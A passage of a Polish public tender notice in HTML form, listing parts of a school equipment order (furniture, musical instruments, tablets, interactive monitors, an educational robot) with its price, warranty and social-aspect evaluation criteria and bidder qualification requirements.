Biologia - zestaw odczynników do Nowej Podstawy Programowej kl. 5-8 Szkoły podstawowej – 1 szt.<br/>19.	Chemia- zestaw odczynników do Nowej Podstawy Programowej kl. 7 i-8 Szkoły podstawowej – 1 szt.<br/>20. Modułowe Pracownie przyrodnicze - moduł Powietrze – 2 komplety.<br/>21. Modułowe Pracownie przyrodnicze - moduł Energia – 2 komplety.<br/>22.	Modułowe Pracownie przyrodnicze- moduł Woda – 2 komplety.<br/>23.	Zestaw klasowy od badania czystości wody i powietrza- 2 komplety.<br/>24. Wyprawa dla dziecka zdolnego – 4 komplety <br/>Szczegółowa specyfikacja zamówienia znajduję się w załączniku nr 1 do SWZ – formularz dodatkowy do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/>2.	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków <br/>w poszczególnych kryteriach oceny ofert ( C+G+S).<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>a)	Kryterium CENA. Waga kryterium - 60 punktów<br/><br/>Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu:<br/><br/>Cmin<br/>C	= ----------------------------x 60<br/>C bad.<br/>gdzie:<br/><br/>C - ilość punktów oferty badanej w kryterium cena<br/>Cmin - najniższa cena (brutto) spośród wszystkich podlegających ocenie ofert <br/>C bad. - cena (brutto) oferty badanej<br/><br/>b)	Kryterium – TERMIN GWARANCJI. Waga kryterium – 30 punktów (G)<br/><br/>W powyższym kryterium oceniany będzie czas wydłużenia minimalnego okresu wymaganej gwarancji. Oferty będą oceniane wg następujących zasad:<br/><br/>-	minimalny okres udzielonej gwarancji – 24 m-ce<br/>-	maksymalny okres udzielonej gwarancji – 48 m-cy<br/>Okres gwarancji 24 miesięcy - 0 pkt<br/>Okres gwarancji 32 miesięcy	-	10 pkt<br/>Okres gwarancji 40 miesięcy	-	20 pkt<br/>Okres gwarancji 48 miesięcy	-	30 pkt<br/><br/>Kryterium okresu udzielonej gwarancji oznacza doliczenie do punktacji 10 punktów za przedłużenie minimalnego okresu gwarancji o 8 m-cy.<br/>Zaoferowanie gwarancji krótszej niż 24 m-cy będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy PZP. W przypadku podania okresu dłuższego, niż ten wynikający <br/>z punktacji będzie skutkowało przyznaniem punktów opartych na okresie wskazanym w zestawieniu. Przykładowo: wskazany w ofercie okres gwarancji i rękojmi 50 miesięcy będzie skutkował przyznaniem 30 pkt.<br/><br/>c)	Kryterium - ASPEKTY SPOŁECZNY. Waga kryterium – 10 punktów (S)<br/><br/>W powyższym kryterium ocenie zostanie poddana deklaracja zaangażowania do realizacji zamówienia co najmniej jednej osoby niepełnosprawnej przez cały okres trwania umowy. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium (maksymalnie 10 punktów).<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie według następującej zasady:<br/>1.	W przypadku braku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych – Wykonawca otrzyma – 0 pkt.<br/>2.	W przypadku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych w ilość min 1 osoby – Wykonawca otrzyma – 10 pkt.<br/><br/>Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularzu oferty. <br/>W przypadku braku możliwości weryfikacji podanych informacji - Zamawiający uzna, iż Wykonawca nie zadeklarował zaangażowania do realizacji zamówienia osób niepełnosprawnych i nie przyzna punktów w przedmiotowym kryterium.<br/>Cdn w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> d)	Część 4 - Dostawa mebli do sal lekcyjnych.<br/> W tym:<br/>1.	Sala szkolna z mobilnymi stołami – 1 komplet<br/>2.	Sala szkolna z mobilnymi stołami – 1 komplet<br/>3.	Mobilna sala szkolna – 1 komplet<br/>4.	Szafa do przechowywania pomocy do zajęć sportowych -2 szt.<br/>5.	Szafa na szkło laboratoryjne z szufladami/szafa chemiczna – 1 szt.<br/>Szczegółowa specyfikacja zamówienia znajduję się w załączniku nr 1 do SWZ – formularz dodatkowy do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39160000-1 - Meble szkolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/>2.	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków <br/>w poszczególnych kryteriach oceny ofert ( C+G+S).<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>a)	Kryterium CENA. Waga kryterium - 60 punktów<br/><br/>Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu:<br/><br/>Cmin<br/>C	= ----------------------------x 60<br/>C bad.<br/>gdzie:<br/><br/>C - ilość punktów oferty badanej w kryterium cena<br/>Cmin - najniższa cena (brutto) spośród wszystkich podlegających ocenie ofert <br/>C bad. - cena (brutto) oferty badanej<br/><br/>b)	Kryterium – TERMIN GWARANCJI. Waga kryterium – 30 punktów (G)<br/><br/>W powyższym kryterium oceniany będzie czas wydłużenia minimalnego okresu wymaganej gwarancji. Oferty będą oceniane wg następujących zasad:<br/><br/>-	minimalny okres udzielonej gwarancji – 24 m-ce<br/>-	maksymalny okres udzielonej gwarancji – 48 m-cy<br/>Okres gwarancji 24 miesięcy - 0 pkt<br/>Okres gwarancji 32 miesięcy	-	10 pkt<br/>Okres gwarancji 40 miesięcy	-	20 pkt<br/>Okres gwarancji 48 miesięcy	-	30 pkt<br/><br/>Kryterium okresu udzielonej gwarancji oznacza doliczenie do punktacji 10 punktów za przedłużenie minimalnego okresu gwarancji o 8 m-cy.<br/>Zaoferowanie gwarancji krótszej niż 24 m-cy będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy PZP. W przypadku podania okresu dłuższego, niż ten wynikający <br/>z punktacji będzie skutkowało przyznaniem punktów opartych na okresie wskazanym w zestawieniu. Przykładowo: wskazany w ofercie okres gwarancji i rękojmi 50 miesięcy będzie skutkował przyznaniem 30 pkt.<br/><br/>c)	Kryterium - ASPEKTY SPOŁECZNY. Waga kryterium – 10 punktów (S)<br/><br/>W powyższym kryterium ocenie zostanie poddana deklaracja zaangażowania do realizacji zamówienia co najmniej jednej osoby niepełnosprawnej przez cały okres trwania umowy. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium (maksymalnie 10 punktów).<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie według następującej zasady:<br/>1.	W przypadku braku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych – Wykonawca otrzyma – 0 pkt.<br/>2.	W przypadku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych w ilość min 1 osoby – Wykonawca otrzyma – 10 pkt.<br/><br/>Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularzu oferty. <br/>W przypadku braku możliwości weryfikacji podanych informacji - Zamawiający uzna, iż Wykonawca nie zadeklarował zaangażowania do realizacji zamówienia osób niepełnosprawnych i nie przyzna punktów w przedmiotowym kryterium.<br/>Cdn w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> e)	Część 5 - Dostawa pomocy dydaktycznych do zajęć z kreatywności artystycznej.<br/>W tym:<br/>1.	Zestaw klasowy rurki – 1 zestaw <br/>2.	Dzwonki – 1 zestawy<br/>3.	Kij deszczowy 10 cm 39’’– 1 zestaw<br/>4.	Bęben ramowy 20’’x 3’’ – 1 szt.<br/>5.	Wózek zabudowany – 1 szt.<br/>6.	Bęben eteryczny – 1 szt.<br/>7.	Kalimba 17 Blaszek – 2 zestawy<br/>8.	Zwiewne chusty od rytmiki – 4 komplety.<br/>Szczegółowa specyfikacja zamówienia znajduję się w załączniku nr 1 do SWZ – formularz dodatkowy do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/>2.	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków <br/>w poszczególnych kryteriach oceny ofert ( C+G+S).<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>a)	Kryterium CENA. Waga kryterium - 60 punktów<br/><br/>Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu:<br/><br/>Cmin<br/>C	= ----------------------------x 60<br/>C bad.<br/>gdzie:<br/><br/>C - ilość punktów oferty badanej w kryterium cena<br/>Cmin - najniższa cena (brutto) spośród wszystkich podlegających ocenie ofert <br/>C bad. - cena (brutto) oferty badanej<br/><br/>b)	Kryterium – TERMIN GWARANCJI. Waga kryterium – 30 punktów (G)<br/><br/>W powyższym kryterium oceniany będzie czas wydłużenia minimalnego okresu wymaganej gwarancji. Oferty będą oceniane wg następujących zasad:<br/><br/>-	minimalny okres udzielonej gwarancji – 24 m-ce<br/>-	maksymalny okres udzielonej gwarancji – 48 m-cy<br/>Okres gwarancji 24 miesięcy - 0 pkt<br/>Okres gwarancji 32 miesięcy	-	10 pkt<br/>Okres gwarancji 40 miesięcy	-	20 pkt<br/>Okres gwarancji 48 miesięcy	-	30 pkt<br/><br/>Kryterium okresu udzielonej gwarancji oznacza doliczenie do punktacji 10 punktów za przedłużenie minimalnego okresu gwarancji o 8 m-cy.<br/>Zaoferowanie gwarancji krótszej niż 24 m-cy będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy PZP. W przypadku podania okresu dłuższego, niż ten wynikający <br/>z punktacji będzie skutkowało przyznaniem punktów opartych na okresie wskazanym w zestawieniu. Przykładowo: wskazany w ofercie okres gwarancji i rękojmi 50 miesięcy będzie skutkował przyznaniem 30 pkt.<br/><br/>c)	Kryterium - ASPEKTY SPOŁECZNY. Waga kryterium – 10 punktów (S)<br/><br/>W powyższym kryterium ocenie zostanie poddana deklaracja zaangażowania do realizacji zamówienia co najmniej jednej osoby niepełnosprawnej przez cały okres trwania umowy. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium (maksymalnie 10 punktów).<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie według następującej zasady:<br/>1.	W przypadku braku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych – Wykonawca otrzyma – 0 pkt.<br/>2.	W przypadku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych w ilość min 1 osoby – Wykonawca otrzyma – 10 pkt.<br/><br/>Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularzu oferty. <br/>W przypadku braku możliwości weryfikacji podanych informacji - Zamawiający uzna, iż Wykonawca nie zadeklarował zaangażowania do realizacji zamówienia osób niepełnosprawnych i nie przyzna punktów w przedmiotowym kryterium.<br/>Cdn w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> f)	Część 6 - Dostawa pomocy dydaktycznych do zajęć z arteterapii<br/>W tym:<br/>1.	Tabety 10,9‘’ + rysik – 12 szt,<br/>2. Etui na tablety – 12 szt.<br/>3.	Ładowarki sieciowe do tabletów – 12 szt,<br/>4.	Folie ochronne do tabletów – 12 szt,<br/>5.	Monitor interaktywny i statyw- 2 szt. (65 cali)<br/>6 Monitor interaktywny i statyw- 2 szt. (76 cali)<br/>7 Interaktywna pomoc dydaktyczna do zabaw ruchowych – 1 szt<br/>8 Robot edukacyjny - 1 szt.<br/>9. mata edukacyjna dedykowana dla robota – 1 szt.<br/>Szczegółowa specyfikacja zamówienia znajduję się w załączniku nr 1 do SWZ – formularz dodatkowy do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213200-7 - Komputer tablet</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18143000-3 - Akcesoria ochronne</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/>2.	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków <br/>w poszczególnych kryteriach oceny ofert ( C+G+S).<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>a)	Kryterium CENA. Waga kryterium - 60 punktów<br/><br/>Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu:<br/><br/>Cmin<br/>C	= ----------------------------x 60<br/>C bad.<br/>gdzie:<br/><br/>C - ilość punktów oferty badanej w kryterium cena<br/>Cmin - najniższa cena (brutto) spośród wszystkich podlegających ocenie ofert <br/>C bad. - cena (brutto) oferty badanej<br/><br/>b)	Kryterium – TERMIN GWARANCJI. Waga kryterium – 30 punktów (G)<br/><br/>W powyższym kryterium oceniany będzie czas wydłużenia minimalnego okresu wymaganej gwarancji. Oferty będą oceniane wg następujących zasad:<br/><br/>-	minimalny okres udzielonej gwarancji – 24 m-ce<br/>-	maksymalny okres udzielonej gwarancji – 48 m-cy<br/>Okres gwarancji 24 miesięcy - 0 pkt<br/>Okres gwarancji 32 miesięcy	-	10 pkt<br/>Okres gwarancji 40 miesięcy	-	20 pkt<br/>Okres gwarancji 48 miesięcy	-	30 pkt<br/><br/>Kryterium okresu udzielonej gwarancji oznacza doliczenie do punktacji 10 punktów za przedłużenie minimalnego okresu gwarancji o 8 m-cy.<br/>Zaoferowanie gwarancji krótszej niż 24 m-cy będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy PZP. W przypadku podania okresu dłuższego, niż ten wynikający <br/>z punktacji będzie skutkowało przyznaniem punktów opartych na okresie wskazanym w zestawieniu. Przykładowo: wskazany w ofercie okres gwarancji i rękojmi 50 miesięcy będzie skutkował przyznaniem 30 pkt.<br/><br/>c)	Kryterium - ASPEKTY SPOŁECZNY. Waga kryterium – 10 punktów (S)<br/><br/>W powyższym kryterium ocenie zostanie poddana deklaracja zaangażowania do realizacji zamówienia co najmniej jednej osoby niepełnosprawnej przez cały okres trwania umowy. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium (maksymalnie 10 punktów).<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie według następującej zasady:<br/>1.	W przypadku braku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych – Wykonawca otrzyma – 0 pkt.<br/>2.	W przypadku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych w ilość min 1 osoby – Wykonawca otrzyma – 10 pkt.<br/><br/>Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularzu oferty. <br/>W przypadku braku możliwości weryfikacji podanych informacji - Zamawiający uzna, iż Wykonawca nie zadeklarował zaangażowania do realizacji zamówienia osób niepełnosprawnych i nie przyzna punktów w przedmiotowym kryterium.<br/>Cdn w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na <br/> zasadach określonych w pkt V SWZ, oraz spełniają określone przez Zamawiającego warunki <br/> udziału w postępowaniu.\<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/> w postępowaniu dotyczące:<br/>2.1	Zdolności do występowania w obrocie gospodarczym.<br/>	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.2	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/> z odrębnych przepisów.<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.3 Sytuacji ekonomicznej lub finansowej<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.4 Zdolności technicznej lub zawodowej<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenia wykonawcy, aktualizujące informacje w zakresie art. 108 ust. 1 pkt 5 ustawy, <br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z <br/> dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 <br/>i 1086),z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1 Formularz oferty przygotowany zgodnie ze wzorem podanym w Załączniku nr 1 do SWZ.<br/> 2 Oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz oświadczenie <br/>o spełnianiu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 i 3 do SWZ.<br/> 3 Pełnomocnictwo / Pełnomocnictwa dla osoby / osób podpisujących ofertę, jeżeli oferta jest podpisana przez pełnomocnika<br/> (o ile upoważnienie to nie wynika <br/>z innych dokumentów dołączonych do oferty). Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej<br/> samej formie, jak składana oferta (t.j. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub<br/> podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio<br/> w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14<br/> lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym,<br/> bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym<br/> podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być<br/> uwierzytelniona przez upełnomocnionego.<br/> 4.W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum),<br/> do oferty powinno zostać załączone pełnomocnictwo dla Osoby Uprawnionej do reprezentowania ich w postępowaniu albo<br/> do reprezentowania ich w postępowaniu i zawarcia umowy.<br/> 5 Zobowiązania innych podmiotów do udostępnienia zasobów, jeżeli Wykonawca korzysta z zasobów innych podmiotów (<br/> załącznik nr 5 do SWZ).<br/> 6 Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4<br/> ustawy, o ile dotyczy (załącznik nr 6 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) 